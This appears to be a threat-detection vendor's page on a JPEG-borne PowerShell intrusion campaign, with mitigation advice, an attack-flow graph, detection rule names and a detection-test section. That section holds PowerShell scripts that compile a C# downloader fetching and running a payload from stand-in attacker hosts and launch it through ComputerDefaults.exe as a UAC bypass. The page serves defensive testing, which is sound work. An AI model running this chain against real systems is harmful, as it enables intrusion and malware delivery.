Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Operation SilentCanvas is a sophisticated multi-stage intrusion that hides a malicious PowerShell payload inside a JPEG file named sysupdate.jpeg. That payload retrieves and compiles a custom launcher, which is built through csc.exe, abuses ComputerDefaults.exe to perform a fileless UAC bypass, and installs a trojanized ConnectWise ScreenConnect service named OneDriveServers to maintain persistent remote access. The malware communicates through encrypted channels routed to legitserver.theworkpc.com over ports 5443 and 8041. The campaign also shows strong emphasis on defense evasion, credential harvesting, and covert surveillance.
Investigation
The report covers both static and dynamic analysis of the JPEG-based loader, the dynamically compiled uds.exe binary, and the modified ScreenConnect components. Researchers identified multiple offensive techniques, including AMSI bypass, living-off-the-land binary abuse, registry hijacking, and custom key derivation for encrypted communication. Infrastructure analysis revealed a hard-coded mapping between legitserver.theworkpc.com and the IP address 45.138.16.64. The investigation also exposed detailed victim profiling, local account manipulation, and functionality tied to hidden desktop access.
Mitigation
Defenders should apply strict allow-listing for legitimate remote monitoring and management tools and restrict or closely monitor execution of csc.exe, cvtres.exe, and ComputerDefaults.exe. Monitoring should also focus on suspicious ms-settings registry changes, PowerShell AMSI bypass behavior, hidden process creation flags, and unauthorized service creation involving the name OneDriveServers. Any accounts that may have been exposed should be reset, and affected systems should be isolated quickly to prevent further abuse.
Response
If related indicators are detected, the endpoint should be quarantined immediately, the malicious uds.exe process and associated PowerShell activity should be terminated, and the OneDriveServers service should be removed from the host. Investigators should collect registry artifacts, service binaries, and network telemetry tied to the command-and-control infrastructure for deeper forensic review. All privileged credentials should be rotated, and defenders should monitor for lateral movement patterns associated with the techniques documented in the campaign.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes u2013 Actions action_initial_access["<b>Action</b> – <b>T1566 Phishing Attachment</b>: Email delivers malicious file <i>sysupdate.jpeg</i> masquerading as an image."] class action_initial_access action action_user_execution["<b>Action</b> – <b>T1204.002 User Execution</b> and <b>T1059.001 PowerShell</b>: Victim doubleu2011clicks the .jpeg which launches embedded PowerShell."] class action_user_execution action action_execution["<b>Action</b> – <b>T1562.001 Disable Security Tools</b> (AMSI bypass) and <b>T1027 Obfuscation</b>: PowerShell script evades detection and hides malicious logic."] class action_execution action action_dev_utility_abuse["<b>Action</b> – <b>T1127 Compile After Delivery</b> and <b>T1027.004 Obfuscated/Stored Files</b>: Script embeds C# source and compiles with <i>csc.exe</i> to create a custom launcher."] class action_dev_utility_abuse action action_priv_esc["<b>Action</b> – <b>T1548.002 Hijack Execution Flow</b> via <i>ms-settings</i> protocol and <b>T1218.002 Compiled HTML File</b> using <i>ComputerDefaults.exe</i> for a fileless UAC bypass."] class action_priv_esc action action_persistence["<b>Action</b> – <b>T1543.003 Windows Service</b> named <i>OneDriveServers</i> and <b>T1136.001 Local Account</b> creation of hidden admin accounts for longu2011term access."] class action_persistence action action_tool_hijack["<b>Action</b> – <b>T1553.002 Signed Binary Proxy Execution</b>: Deploys trojanized ConnectWise ScreenConnect binary abusing legitimate signed components."] class action_tool_hijack action action_credential_access["<b>Action</b> – <b>T1556.001 Credential API Hooking</b> and <b>T1056.001 Input Capture</b>: Installs Credential Provider hook and keylogger to harvest user credentials."] class action_credential_access action action_collection["<b>Action</b> – <b>T1113 Screen Capture</b>, <b>T1125 Video Capture</b>, <b>T1123 Audio Capture</b>, <b>T1115 Clipboard Data</b>: Gathers visual, audio and clipboard information."] class action_collection action action_discovery["<b>Action</b> – <b>T1518 Software Discovery</b>, <b>T1010 Application Window Discovery</b>, <b>T1082 System Information Discovery</b>: Enumerates installed software, AV products, system info and active windows."] class action_discovery action action_c2["<b>Action</b> – <b>T1573 Encrypted Channel</b>: Sets up encrypted C2 using PBKDF2/HMACu2011SHA256 keys and transfers additional tools via <b>T1105 Ingress Tool Transfer</b>."] class action_c2 action action_remote_execution["<b>Action</b> – <b>T1021 Remote Services</b>: Executes commands on the victim through the ScreenConnect framework."] class action_remote_execution action action_impact["<b>Action</b> – <b>T1529 System Shutdown/Reboot</b>: Can trigger a system reboot or safeu2011mode restart to disrupt the environment."] class action_impact action %% Nodes u2013 Tools / Processes tool_sysupdate_jpeg["<b>Tool</b> – <b>Name</b>: sysupdate.jpeg<br/><b>Type</b>: Malicious attachment disguised as image"] class tool_sysupdate_jpeg tool tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Type</b>: Scripting engine used for execution and obfuscation"] class tool_powershell tool tool_csc["<b>Tool</b> – <b>Name</b>: csc.exe<br/><b>Type</b>: C# compiler leveraged onu2011host"] class tool_csc tool process_computerdefaults["<b>Process</b> – <b>Name</b>: ComputerDefaults.exe<br/><b>Description</b>: Used as a proxy for fileless UAC bypass"] class process_computerdefaults process tool_screenconnect["<b>Tool</b> – <b>Name</b>: ConnectWise ScreenConnect<br/><b>Type</b>: Remoteu2011access software hijacked with malicious payload"] class tool_screenconnect tool malware_keylogger["<b>Malware</b> – <b>Name</b>: Custom Keylogger<br/><b>Purpose</b>: Capture keystrokes and credentials"] class malware_keylogger malware %% Connections u2013 Attack Flow action_initial_access –>|delivers| tool_sysupdate_jpeg tool_sysupdate_jpeg –>|triggers| action_user_execution action_user_execution –>|executes| tool_powershell tool_powershell –>|performs| action_execution action_execution –>|uses| tool_csc tool_csc –>|creates| action_dev_utility_abuse action_dev_utility_abuse –>|produces launcher for| action_priv_esc action_priv_esc –>|invokes| process_computerdefaults process_computerdefaults –>|enables| action_persistence action_persistence –>|creates| action_tool_hijack action_tool_hijack –>|installs| tool_screenconnect tool_screenconnect –>|facilitates| action_credential_access action_credential_access –>|installs| malware_keylogger malware_keylogger –>|enables| action_collection action_collection –>|feeds data to| action_c2 action_c2 –>|supports| action_remote_execution action_remote_execution –>|uses| tool_screenconnect action_remote_execution –>|leads to| action_impact action_discovery –>|provides info for| action_c2 %% Styling class tool_sysupdate_jpeg tool class tool_powershell tool class tool_csc tool class tool_screenconnect tool class process_computerdefaults process class malware_keylogger malware "
Attack Flow
Detections
Possible UAC Bypass via CMSTPLUA COM Interface [SafaPay technique] (via cmdline)
View
Possible Antivirus or Firewall Software Enumeration (via process_creation)
View
Alternative Remote Access / Management Software (via process_creation)
View
An Archive Was Extracted To Suspicious Directory Using Powershell (via powershell)
View
IOCs (HashSha256) to detect: OPERATION SILENTCANVAS : JPEG BASED MULTISTAGE POWERSHELL INTRUSION
View
IOCs (SourceIP) to detect: OPERATION SILENTCANVAS : JPEG BASED MULTISTAGE POWERSHELL INTRUSION
View
IOCs (DestinationIP) to detect: OPERATION SILENTCANVAS : JPEG BASED MULTISTAGE POWERSHELL INTRUSION
View
Encrypted Communications with Attacker Infrastructure via Non-Standard Ports [Windows Network Connection]
View
Intrusion Detection via Abuse of csc.exe and ComputerDefaults.exe [Windows Process Creation]
View
PowerShell Execution with AMSI Bypass [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
- Initial foothold: Attacker gains a low‑privileged PowerShell session on the endpoint.
- Live compilation: Using the already‑available
csc.exe, the attacker compiles a C# downloader that fetches a second‑stage payload from a C2 server. The compilation is launched from the PowerShell process to satisfy the parent‑child condition. - File‑less UAC bypass: The attacker runs the newly‑built executable via
ComputerDefaults.exe, which silently requests elevation without showing a UAC prompt. - Post‑elevation execution: The elevated payload establishes a reverse shell back to the adversary.
# Step 1 – Prepare malicious C# source (in-memory) $csSource = @" using System; using System.Net; using System.Diagnostics; public class Downloader { public static void Main() { using (WebClient wc = new WebClient()) { string payloadUrl = "http://malicious.example.com/payload.exe"; string tempPath = System.IO.Path.Combine($env:TEMP, "payload.exe"); wc.DownloadFile(payloadUrl, tempPath); Process.Start(tempPath); } } } "@ $srcPath = "$env:TEMPDownloader.cs" $exePath = "$env:TEMPDownloader.exe" $csSource | Out-File -FilePath $srcPath -Encoding ASCII # Step 2 – Compile via csc.exe (parent = PowerShell) & "$env:WINDIRMicrosoft.NETFramework64v4.0.30319csc.exe" /nologo /t:exe /out:$exePath $srcPath # Step 3 – Trigger UAC bypass using ComputerDefaults.exe (still child of PowerShell) $computerDefaults = "$env:SystemRootSystem32ComputerDefaults.exe" Start-Process -FilePath $computerDefaults -ArgumentList "`"$exePath`"" -WindowStyle Hidden -
Regression Test Script: (self‑contained PowerShell script that reproduces the above steps)
# ----------------------------------------------------------------- # File: trigger_csc_uac_bypass.ps1 # Purpose: Simulate the csc.exe + ComputerDefaults.exe attack chain # ----------------------------------------------------------------- # Create malicious C# source in the TEMP directory $src = @" using System; using System.Net; using System.Diagnostics; public class Payload { public static void Main() { using (WebClient wc = new WebClient()) { string url = "http://example.com/evil.exe"; string path = System.IO.Path.Combine($env:TEMP, "evil.exe"); wc.DownloadFile(url, path); Process.Start(path); } } } "@ $srcPath = Join-Path $env:TEMP "Payload.cs" $exePath = Join-Path $env:TEMP "Payload.exe" $src | Out-File -FilePath $srcPath -Encoding ASCII # Compile with csc.exe (this PowerShell process becomes the parent) $csc = "$env:WINDIRMicrosoft.NETFramework64v4.0.30319csc.exe" & $csc /nologo /t:exe /out:$exePath $srcPath # Execute via ComputerDefaults.exe to perform a silent UAC bypass $computerDefaults = "$env:SystemRootSystem32ComputerDefaults.exe" Start-Process -FilePath $computerDefaults -ArgumentList "`"$exePath`"" -WindowStyle Hidden -
Cleanup Commands:
# Remove generated artifacts Remove-Item -Path "$env:TEMPPayload.cs" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPPayload.exe" -Force -ErrorAction SilentlyContinue # Optionally terminate any lingering processes started by the test Get-Process -Name "evil" -ErrorAction SilentlyContinue | Stop-Process -Force